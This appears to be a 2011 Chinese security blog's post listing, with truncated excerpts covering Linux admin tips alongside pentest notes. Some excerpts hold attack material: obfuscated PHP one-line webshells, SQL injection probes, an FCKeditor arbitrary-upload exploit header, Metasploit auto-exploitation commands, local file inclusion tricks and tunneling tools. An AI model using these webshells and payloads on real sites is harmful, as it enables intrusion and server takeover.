- 博客(32)
- 资源 (1)
- 收藏
- 关注
原创 ubuntu 设置静态IP
首先设置IPsudo gedit /etc/network/interface将其内容删除加上一下内容auto loiface lo inet loopbackauto ethoiface etho inet staticaddress 192.168.0.168netmask 255.255.255.0network
2011-10-31 09:16:49 399
原创 最新php一句话
第一种:1.php$_=@$_GET[2]).@$_($_GET[1])?>在菜刀里写http://127.0.0.1/1.php?2=assert密码是1第二种2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://127.
2011-10-28 17:11:39 786
原创 FCKeditor all version File Upload
In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author : pentesters.ir[
2011-10-28 17:07:56 523
原创 Arachni - Web Application Security Scanner Framework
Version0.3Homepagehttp://arachni.segfault.grBloghttp://trainofthought.segfault.gr/category/projects/arachni/Github pagehttp://github.com/zapotek/arachniDocumentatio
2011-10-27 17:20:45 1527
原创 skipfish - web application security scanner
Written and maintained by Michal Zalewski [email protected]>.Copyright 2009, 2010, 2011 Google Inc, rights reserved.Released under terms and conditions of the Apache License, version 2.0.What is
2011-10-26 17:18:38 2030
转载 命令小记之 find 命令
1. 想查看当前文件夹及子文件夹里有没有文件名为“abc”的文件# find . -name abc. :表示当前目录-name:表示要根据名称查找2. 想查看当前文件夹及子文件夹里有没有”xyz”目录# find . -type d -name xyz-type:表示设定类型,d表示文件夹类型,可以替换为f(普通文件)、l(链接文件
2011-10-26 16:01:34 471
转载 命令小记之 chkconfig 命令
chkconfig在命令行操作时会经常用到。它可以方便地设置各个系统运行级别启动的服务。这个可要好好掌握,用熟练之后,就可以轻轻松松的管理好你的启动服务了。想列出系统所有的服务启动情况:# chkconfig --list想列出mysqld服务设置情况:#chkconfig --list mysqld设定mysqld在等级3和5为开机运行
2011-10-26 15:26:16 371
转载 命令小记之 uname 命令
uname -a 打印所有系统信息uname -s 打印内核名称uname -n 打印网络节点主机名uname -r 打印内核发信版本号uname –help 获得帮助信息查看系统版本号的方法还有:cat /proc/versioncat /etc/redhat-releasecat /etc/issue
2011-10-26 15:25:11 424
原创 Linux SSH 连接安全配置
一、安全配置1. 限制所有IP都无法连接# vi /etc/hosts.denysshd:ALL2. 允许指定的IP地址连接,xxx.xxx.xxx.表示网段# vi /etc/hosts.allowsshd:xxx.xxx.xxx.3. 修改SSH配置文件# vi /etc/ssh/sshd_config#
2011-10-26 15:08:52 601
原创 清除 MySQL 二进制日志
只需要两句话:# 此命令显示当前使用的二进制日志,或者说日志数目mysql> SHOW MASTER LOGS;+---------------+----------+--------------+------------------+| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |
2011-10-26 15:06:50 479
原创 nmap端口扫描器参数详解
常用最详细的扫描参数:db_nmap -sS -sU -T4 -A -v -O -Pn 127.0.0.1官网中文说明文档http://nmap.org/man/zh/man-version-detection.htmlnmap-网络探测和安全扫描工具2.语法nmap [Scan Type(s)] [Options]3.描述 nmap是一个网络探测
2011-10-25 11:16:06 3986
原创 Oracle TNS CMD 溢出资料
Metasploit 的Oracle TNS 溢出模块 auxiliary/admin/oracle/tnscmd 从国外网站找的exploit资料: Tnscmd2001/05/09 05:29:09 ExpI. Introtnscmd can be used to speak, on a very simple level, with Oracle's
2011-10-24 17:17:05 1173
原创 oracle技术文档
作者:Robert配合open那个工具第一部分基本查询指令select * from V$PWFILE_USERS //查看dba用户select * from v$version //查看oracle版本以及系统版本select * from session_privs;// 查看当前用户拥有的权限值select * from user_role_privs\
2011-10-24 11:53:28 611
原创 Nmap 突破防ping扫描
Nmap命令下本人常用扫描参数为: nmap -sS -sU -T4 -A -v 127.0.0.1测试中遇到的问题,做个记录。一般用nmap 扫描目标的参数是:db_nmap -sV -o -T4 192.168.1.254 服务器做了防Ping,那么用 以下参数突破:db_nmap -sV -O -T4 -Pn 192.168.1.254
2011-10-21 10:44:29 5691
原创 在线渗透测试工具集合
在这个网站http://www.subhashdasyam.com/你可以发现一些在线的渗透测试工具。大家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用在线端口扫描: http://scan.subhashdasyam.com/port-scanner.php在线VNC扫描: http://scan.subhashdasyam.com/dumpe
2011-10-20 17:06:40 894
原创 Metasploit入侵windows之自动扫描
在msf 命令行下输入:db_autopwn -p -e -t 192.168.1.1然后可以看到,metasploit正在探测各种漏洞,看是否匹配刚才检测出来的端口,接下来他会自动进行登录尝试,看是否能建立连接。最后我们发现有两个session可以建立与对方连接,并获取权限,我通过sessions命令进一步查看这里session类型是meterpreter,不同
2011-10-20 16:59:59 1723
原创 手工MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) /
2011-10-14 13:55:21 441
原创 针对上传木马找不到名字的解决办法
有时 传了 木马上去后 直接是 xiaoma.asp还有种 是按照时间生成名字如201103091**************.asp下面这种如果又 没有回显的话 就可以做 个字典扫生成字典uploadfile/2011/1/1/2011012847000000.
2011-10-14 13:50:57 515
原创 SQL手工注入大全
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多,看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;an
2011-10-14 13:49:26 621
转载 变态的Web服务器IIS安全设置
一.删除默认共享.关闭139.445端口 选择 “ 计算机管理 ” 程序,选择 “ 共享文件夹 ” ,在相应的共享文件夹上按右键,选择 “ 停止 ” 共享即可。不过在系统重新启动后, IPC$ 和 printer$ 会再次共享。 IPC$ 和 printer$
2011-10-14 09:44:49 500
原创 DNS+tunnel(DNS隧道)技术-DNS2tcp的使用方法及原理
最近遇到了国内某大牛,听说了一个叫做DNS tunnel的技术,经过一番研究,发现很有趣,记录一下。什么是DNS tunnel?DNS tunnel 即 DNS隧道。从名字上来看就是利用DNS查询过程建立起隧道,传输数据。为什么使用DNS tunnel?
2011-10-14 09:28:32 10664 1
原创 Metasploit Framework 简单介绍
1.简介Metasploit Framework 是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。2.主页www.metasploit.co
2011-10-13 15:37:56 694
原创 最炫的万能溢出武器——“Metasploit”
2005年6月,在西雅图郊区的微软公司总部园区内的管理情报中心,微软公司召开了一次“蓝帽”峰会。在会议中一款名为“Metasploit”的黑客工具出尽了风头,让微软公司的安全人员认为网络安全历史将因此工具而改写……Metasploit简介Metasploit其实是一个溢出
2011-10-13 15:33:18 765
原创 PHP本地文件包含(LFI)漏洞利用
如果是在win上,提交:test.php?for=D:\tools\readme.txt%00,就可以了,跨目录跨盘符。这里要注意,对于过多的”..\”,360会自动拦截,比较好的办法是使用ie或者ff。但是光是浏览文件是不够的,我们还需要webshell。可以使用log
2011-10-13 11:24:59 626
原创 Linux安装软件有关的命令(dpkg 安装deb包)
dpkg(底层一些的包管理工具,用上apt(高级包管理工具)之后,一般是不需要处理单个的deb文件的。如果需要,就要用dpkg命令)1.dpkg -i gedit-2.12.1.deb:安装gedit2.dpkg -r gedit:卸载gedit,但不删除配置文件
2011-10-12 14:42:37 1702
转载 XSRF 跨站请求伪造
简单介绍:今天我们谈谈“跨站请求伪造”(CSRF / XSRF)(Cross Site Request Forgery)。而这种脆弱性在网络上是十分的普遍,许可证是通过一个受害者在发送一个HTTP请求到网站,然后以这种方式记录和信任该用户。以这种方式攻击须要构造一
2011-10-12 12:08:50 515
原创 常见虚拟主机目录对照
D:\virt lhost\web580651\www\ 新网虚拟主机F:\usr\fw04408\xpinfo\ 万网虚拟主机D:\hosting\wwwroot\ Prim@Hosting虚拟主机e:\wwwroot\longzhihu\wwwro
2011-10-11 14:37:01 609
转载 linux入侵的基本命令
Linux系统下基本命令: 要区分大小写系统 # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo # 查看CPU信息 #
2011-10-11 13:17:33 490
转载 各种网络环境渗透测试简述
一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个
2011-10-11 11:13:32 975
转载 内网渗透利器--reDuh
国外大牛的作品,偶顺手写了个使用说明。E文好的看原文http://www.sensepost.com/research/reDuh/这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服
2011-10-11 09:43:54 709
原创 Fckeditor 2.4.2 php任意上传文件漏洞+修补方法
漏洞文件:fckeditor/editor/filemanager/upload/php/upload.php fckeditor/editor/filemanager/upload/php/config.php问题主要是出在config.php文件中未对
2011-10-08 17:03:32 1834
转载 asp上传过滤代码(强)
VBScript code-----------------------------------------------------------------------------------------------------set MyFile = server.Cr
2011-10-08 09:35:53 519
青云服务器安全设置器V2011正式版
2011-09-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人